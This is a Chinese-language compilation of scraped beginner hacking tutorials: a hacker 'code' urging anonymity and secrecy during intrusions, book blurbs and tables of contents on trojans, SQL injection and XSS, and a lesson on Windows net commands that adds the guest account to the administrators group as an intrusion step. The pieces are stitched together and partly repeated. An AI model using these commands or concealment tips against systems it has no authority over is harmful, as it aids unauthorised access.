如果你只是使用电脑, 那仅为非法使 用!! 注意: 千万不要破坏别人的软体或资料!! 2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後 将它改回原状. 3. 不要轻易的将你要Hack 的站台告诉你不信任的朋友. 4. 不要在bbs 上谈论你Hack 的任何事情. 5. 在Post 文章的时候不要使用真名. 6. 正在入侵的时候, 不要随意离开你的电脑. 7. 不要侵入或破坏政府机关的主机. 8. 不在电话中谈论你Hack 的任何事情. 9. 将你的笔记放在安全的地方. 10. 想要成为Hacker 就要真正的Hacking, 读遍所有有关系统安全或系统漏洞 的文件(英文快点学好)! 11. 已侵入电脑中的帐号不得清除或修改.
新手学黑客攻防(入门篇) 内容简介 随着互联网技术的不断发展,信息交流更加高效、便捷,各种新的网络功能不断涌现,网络在促进经济发展、推动社会进步和提高人们的生活质量等方面发挥着越来越重要的作用。然而与此同时,网络的安全问题也变得日趋严重,需要引起每一个电脑用户的重视。在网络中有一群被称为“黑客”的神秘人物。最早黑客是指热心于计算机技术、水平高超的电脑专家,尤指程序设计人员。但到了今天,黑客已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙。作为一个有一定操作经验的电脑用户,读者有必要了解一些黑客的知识,通过模拟黑客的行为准则以及入侵网络的方式、方法,反过来发现自身存在的问题,做好防范工作,从而最终保证自己的数据信息和网络财产的安全。本书共11章。第1章介绍黑客的基础知识,包括黑客入侵的途径、入侵命令以及入侵的方式。第2章介绍Windows系统中存在的安全隐患和漏洞。第3章介绍针对Windows系统中存在的漏洞如何设置电脑,从而实现防范黑客通过漏洞攻击电脑的目的。第4章~第6章介绍黑客从信息收集、植入木马、到最后进行远程控制与入侵的一个完整流程。第7章~第9章介绍黑客如何
对QQ、电子邮件与网页进行攻击,以及电脑用户应该怎样防范。第10章介绍防范木马与黑客的一些小方法。最后的第11章介绍被黑客入侵后,如何隐藏信息与创建后门。本书采用全彩印刷,配1张多媒体教学视频光盘。彩色印刷能使图文对比更加鲜明、直观,使学习过程更加愉悦。多媒体教学视频让读者像看电视一样学电脑,学习效果立竿见影。目录 第1章黑客基础知识 1.1 黑客的概述 1.2黑客必经的两道门:IP地址与端口 1.2.1 IP和IP地址 1.2.2 端口的概述 1.2.3 查看端口 1.2.4 关闭端口和限制端口 1.3 黑客常用命令 1.3.1 路由与网关 1.3.2 ping命令 1.3.3 net命令 1.3.4 telnet命令 1.3.5 ftp命令
黑客入门教程 前言:你是不是很喜欢黑客呢?是不是经常周游于各个黑客站点呢?学黑客是真的很难的!它需要你有足够的耐性!毅力!只有持之以恒才能有所成就!好了~灌了那么多的水,下面就开始吧!注意:本文只适合新手!已入门的请去看别的技术文章吧!下面就用我仅仅知道的知识让你们取得第一次的成功吧!操作系统拜托你装个2000的好不好?不要再问为什么了~(本文注释用"注释内容"标记! 第一节课:命令的使用 你必须懂得一些命令才能更好地运用!总不能一边入侵一边去看例文吧!(什么?你喜欢?我晕了~)好了~下面就看看一些常用的命令吧!也就是入侵必须懂得的基本命令!如果你连这都栏得看的话你就可以放学了~放你的长假去吧! https://www.doczj.com/doc/3e18594408.html, NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] 上面就是net命令.你可以在开始-运行里键入command (dos)下键入net/?获得.我们看看一些常用的. net user 列举所有用户例子:c:>net user net localgroup 把用户分组例子:c:>net localgroup administrators guest /add 把guest用户加到管理组.需要有足够的权限才能进行操作! net share 显示共享资源例子:c:>net share net start 启动服务,或显示已启动服务的列表例子:>net start 例 子:>net start telnet 启动telnet net stop 停止Windows2000网络服务例子c:>net stop telnet 停止telnet服务 net time 显示时间例子:c:>net time 127.0.0.1 显示127.0.0.1的时间 net use 显示关于计算机连接的信息例子:c:>net use net view 显示域列表、计算机列表或者由指定计算机共享的资源例子:c:>net view net的基本命令就到此结束吧!但并不是说其它的命令不用去学!只是我的基本教学(入侵)课程需要用的命令是这些而已~自己去windows帮助那里看看吧!DOS下的基本命令是很重要的!如:copy等.还有ftp等等重要的命令因为种种原因请各位自行去看.(基本课程不能太复杂的,OK?!!!)好了~下课~
最新黑客技术入门基础教程大全 目录 1 黑客简介 (3) 2 保护自己电脑绝对不做黑客肉鸡 (4) 3 抓肉鸡的几种方法 (9) 4 防止黑客通过Explorer侵入系统 (18) 5 SQL注入详解 (20) 5.1 注入工具 (21) 5.2 php+Mysql注入的误区 (22) 5.3 简单的例子 (25) 5.4 语句构造 (28) 5.5 高级应用 (45) 5.6 实例 (54) 5.7 注入的防范 (59) 5.8 我看暴库漏洞原理及规律1 (60) 5.9 我看暴库漏洞原理及规律2 (66) 6 跨站脚本攻击 (71) 6.1 跨站脚本工具 (71) 6.2 什么是XSS攻击 (72) 6.3 如何寻找XSS漏洞 (72)
6.4 寻找跨站漏洞 (73) 6.5 如何利用 (74) 6.6 XSS与其它技术的结合 (77) 7 XPath注入 (77) 7.1 XPath注入介绍 (77) 7.2 XPath注入工具 (82) 声明:文章来源大多是网上收集而来,版权归其原作者所有。
1黑客简介 "黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。之所以要区分黑客和恶意骇客,是因为在某些情况下,我们讨论的对象是那些毫无恶意并且不会对安全防御或者用户隐私造成损害的对象,这些人只有用"黑客"这个词来描述才最贴切。如果你只是简单的将"黑客"和"恶意的安全骇客"划等号,将无法在与人交流安全技术问题时,轻松的分辨别人所指的到底是哪种类型的人。黑客和骇客的区别是,黑客仅仅对技术感兴趣,而后者则是通过技术获取职业发展或者谋生。很多黑客和骇客都具有技术天赋,有些骇客据此进行职业发展。当然,并不是每个有技术天赋的人都必须沿着黑客或者骇客的方向发展。黑客这个术语的经典意义是指那些对于事物如何工作非常感兴趣的人,他们修理,制作或者修改事物,并以此为乐。对于某些人来说,这个词并不准确,而对于另一些人来说,黑客意味着最终能完全掌握某些事情。根据RFC1392的记载,互联网用户词汇将"黑客"定义为:迷恋于获取某些系统尤其是计算机和计算机网络系统内部运作
相信能看到我这个帖子的人,多多少少对于黑客知识都有些痴迷。那么作为一名新手来到百度黑客吧,应该怎么去学呢? 相信这一点大家很少考虑吧。你要是为了盗个QQ号,或者说黑一些什么网站然后挂上自己的QQ号的话,那么我可以告诉你,应该说你在学习的道路上很难突破某种瓶颈。 那么到底学习什么呢?就目前而言有以下几种(一些其它的不细说)第一种脚本注入 1,脚本script是使用一种特定的描述性语言,依据一定的格式编写的可执行文件,又称作宏或批处理文件。如今的脚本语言相当多了,一般的脚本语言的执行只同具体的解释执行器有关,所以只要系统上有相应语言的解释程序就可以做到跨平台。比如常见的后缀名为.cfg格式的文件。 2,动态程序一般有两种实现方式,一是二进制方式,一是脚本方式。脚本是批处理文件的延伸,是一种纯文本保存的程序,一般来说的计算机脚本程序是确定的一系列控制计算机进行运算操作动作的组合,在其中可以实现一定的逻辑分支等,可以说打麻将赌博是为了搞服业,写小说、剧本等也可以理解为写脚本。 第二种漏洞攻防 漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。当然了,这种说法比较笼统。比如说常见的远程端口、数据库空口令、影
子空密码、黑社会和远程控制任我行的默认端口和密码。计算机安全分级标准在“橘皮书”中都有所定义。入侵者只要找到复杂的计算机网络中的一个缝,就能轻而易举地闯入系统。所以,了解这些缝都有可能在哪里,对于修补它们至关重要。通常,裂缝主要表现在软件编写存在bug、系统配置不当、口令失窃、明文通讯信息被监听以及初始设计存在缺陷等方面。正所谓打狗要用打狗棒,降魔要使降魔杖。物品在当你买下的那一刻开始就已经贬值,系统在发行的那一刻起也就意味着搅入了漏洞攻防战之中。 第三种加密解密 这个说起来就有些大了;一个算法、一个程序的保护、你把自己家里门锁了、穿上衣服拉上拉链、破解一个软件、免杀了一个程序等等这都可以理解为加密解密。要学好加密解密,最好能了解一门语言,这样的话学起来事半功倍,不然遇到汇编语言、c或者其他语言你会很头疼的。说了这么多那么到底怎么学习呢? 1,软件是为硬件服务的,你没有一台电脑也总该有一本书吧,没电脑没书你总该有学习知识的渴望性吧。 2,要有一个学习的环境,加一些技术交流群,多与其他的人交流。最好能遇到几个交心的朋友,当然了可遇而不可求。有了交流一方面能巩固自己的知识,同时也能听到为了一种结果而采取的不同路径方法。在最短的时间内达到最完美的效果这就叫技术,这就叫牛逼。
黑客最早源自英文hacker,早期在美国的电脑界是带有褒义的,但在媒体媒体报道中,黑客一词往往指那些软件骇客(software cracker)。但是随着互联网的不断发展,以及网络安全的不断加固,一些人开始视黑客为一项业余的嗜好,而这些人不做恶意破坏,只追求共享 黑客最早源自英文hacker,早期在美国的电脑界是带有褒义的,但在媒体媒体报道中,黑客一词往往指那些“软件骇客”(software cracker)。但是随着互联网的不断发展,以及网络安全的不断加固,一些人开始视“黑客”为一项业余的嗜好,而这些人不做恶意破坏,只追求共享、免费,他们的出现推动了计算机和网络的发展与完善。那么对于一些初级爱好者来说,黑客基础入门知识便显得尤为重要,今日小编就为大家带来了黑客基础入门之初级安全命令介绍,以便初学者能够更好的追求自己的业余嗜好。 在M$的操作系统中,与网络安全较有关系的几个命令/程序是:ping\winipcfg\tracert\net\at\netstat。因此,小编将一一为大家介绍: 1. ping:这是TCP/IP协议中最有用的命令之一 它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。 Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] [-k host-list]] [-w timeout] destination-list Options: -t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)-a Resolve addresses to hostnames.(把IP转为主机名) -n count Number of echo requests to send.(响应请求的数量) -l size Send buffer size.(封包的大小) -f Set Don't Fragment flag in packet.(信息包中无碎片) -i TTL Time To Live.(时间) -v TOS Type Of Service.(服务类型) -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧) -w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)